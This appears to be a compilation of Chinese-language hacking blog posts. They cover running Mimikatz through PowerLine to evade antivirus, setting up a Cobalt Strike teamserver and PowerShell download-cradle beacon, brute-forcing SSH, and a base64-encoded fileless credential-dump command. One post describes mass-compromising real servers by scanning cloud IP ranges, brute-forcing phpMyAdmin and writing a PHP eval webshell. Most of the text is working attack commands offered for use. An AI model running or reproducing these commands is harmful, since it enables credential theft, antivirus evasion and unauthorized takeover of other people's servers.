Powershell AV Evasion. Running Mimikatz with PowerLine

PowerShell默认存在于所有Windows 7+上，并且正在成为在Windows中执行所需脚本的最常用方法。因此产品开始阻止或警告PowerShell的使用。
网络上也有很多关于ps的混淆脚本和混淆技巧，对于国内的一些杀毒其实已经够了，但是如果遇到了比如eset/avast等杀毒就会被拦截了。
经过测试，检查防病毒是否检测到此行为，因此在执行阶段就已经失效。

Powerline是由Brian Fehrman（@fullmetalcache）创建的一个很棒的工具，允许调用PowerShell脚本。它是用C＃编写的（不直接调用PowerShell），可以完全从命令行使用。

构建和使用：
部署构建很简单
1、从github下载代码https://github.com/fullmetalcache/PowerLine
2、运行build.bat
3、更新UserConf.xml文档以包含您要包含的ps脚本的URL
4、运行plbuilder.exe，powerline.exe生成成功
使用：
当你构件好powerline后接下来就是把powerline.exe放到目标机器上。可以通过shell上传或者远程下载功能。

certutil -urlcache -split -f http://atackerIP/PowerLine.exe PowerLine.exe

上传后执行（默认的userconf.xml中带的是invoke-mimikatz）:

PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command \"`\"privilege::debug`\" `\"sekurlsa::logonPasswords`\"\""

Avast(图片来自引用博客):

国内杀毒（图片来自本地测试）：

可以看到已经达到了绕过的需求。
可以通过修改默认导入的ps脚本来满足不同环境下的需求。

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

引用：

    https://github.com/fullmetalcache/PowerLine/blob/master/README.md
 https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html

Cobalt Strike安装使用并回弹一个shell
Cobalt Strike是一款渗透测试神器，常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用，它分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。
Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。也是一个C/S结构的工具
首先登陆远程服务器，cs是一个团队协作的工具，而且可以隐藏后端攻击者ip，所以远程登录到服务器上，并安装java8

在服务器上执行
./teamserver 10.14.4.16 123
ip是你服务器的公网/内网地址 123是连接密码

在客户端上运行。

用户名随意，密码123
连接后

这就已经成功连接到服务器上了。

接下来创建一个监听事件

在这里创建一个监听事件，监听端口选择8088

beacon的地址也选择外网地址反射回的，如果前端没有其他转发服务器的话。

监听建立成功。
接下来生成shell
attacks》web drive-by》

目标机器是win7，那么我使用powershell来远程下载。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.14.4.16:80/aaaa'))"

生成代码已经给出了

在win下执行命令

可以看到，已经上线了。
稍后可能会写怎么绕过火绒的提醒，执行shell

利用python-pxssh实现ssh暴力破解，昨天的文章中完成了利用pexpect来执行登录ssh的操作，今天利用pxssh来进行暴力破解，pxssh是一个在pexpect库中的专用脚本，不需要单独安装，有的python版本可以直接import pxssh，有的则需要from pexpect import pxssh 来进行包含，这个根据各自版本进行修改。我的是后者的方式。
源码如下：（存在word中了。。。。代码就成两行，就截图了）

上一篇文章说篇幅太少，其实操作就那样，没必要一步一步的说明，有的朋友给我发邮件私聊了下，很简单就复现了。

接下来正文，之前发现某些免流脚本，都是默认密码，数据库管理都是phpmyadmin，lnmp自动安装的，有些选项都没有让用户自己填写，导致了批量shell。简介就是这样。坛子里好像是有过入侵的，不过是通过burp爆破phpmyadmin。通用了一下，大家就明白了吧。
首先我了解到免流的web服务通常使用1234端口和808端口，那么开始找腾讯云的ip段进行扫描。

扫描后复制下来保存到记事本中，批量处理下后缀名。

保存ip之后导入，设置用户名，密码字典等。


开始爆破。
爆破之后导出ip和密码

之前有过某个做黑产的牛发的扫过的。
逐条打开测试

登陆phpmyadmin
点击sql，既然是mysql的root权限，那就可以通过找到绝对路径后写shell，
而脚本安装都是统一的目录，而且安装的是lnmp环境。So

 select '<?php @eval($_POST[1111])?>' into outfile '/home/wwwroot/default/admin/index1.php'

一句话写入，这样的话可以用菜刀连接了

这是之前搞得12月份的批量，基本两个小时。

绕过杀毒执行ps-实现无文件落地导hash

直接执行。三款国内杀毒只有360拦截了执行。
powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://xxxx.xx/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds"

Base64编码后执行
$text = 'Hello World!'

替换Hello World!

powershell.exe -eNco SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA=

替换后执行。

绕过并导出了hash。这个办法在2008、win7上遇到装有360等国内杀毒的时候可以尝试下